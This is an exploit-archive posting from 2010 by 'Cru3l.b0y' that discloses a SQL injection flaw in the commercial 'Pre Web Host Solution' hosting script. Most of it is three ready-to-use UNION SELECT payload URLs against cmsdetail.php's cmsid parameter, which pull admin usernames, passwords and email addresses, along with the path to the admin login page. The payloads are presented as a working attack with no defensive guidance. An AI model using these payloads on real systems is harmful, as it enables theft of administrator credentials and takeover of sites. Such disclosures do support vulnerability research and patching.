[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Pre Wew Hhost Solution SQL Injection Vulnerability
# Published : 2010-11-13
# Author : Cru3l.b0y
# Previous Title : Joomla Component com_jsupport SQL Injection Vulnerability
# Next Title : Joomla Component com_jsupport Critical XSS Vulnerability


In The Name Of GOD
[+] Exploit Title: PRE WEB HOST SOLUTION SQL Injection Vulnerability
[+] Date: 2010-11-13
[+] Author  : Cru3l.b0y
[+] Software Link: http://www.preproject.com/preweb.asp
[+] Price : 150.00$
[+] Contact : Cru3l.b0y@gmail.com
[+] Website : WwW.PenTesters.IR
[+] Greeting: Behzad, Ahmad, ...

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[+] Exploit : 

             Username : http://target/path/cmsdetail.php?cmsid=1+union+select+1,2,3,username+from+admin
             Password : http://target/path/cmsdetail.php?cmsid=1+union+select+1,2,3,pass+from+admin
             Email    : http://target/path/cmsdetail.php?cmsid=1+union+select+1,2,3,Email+from+admin

[+] Admin Page: admin/adminlogin.php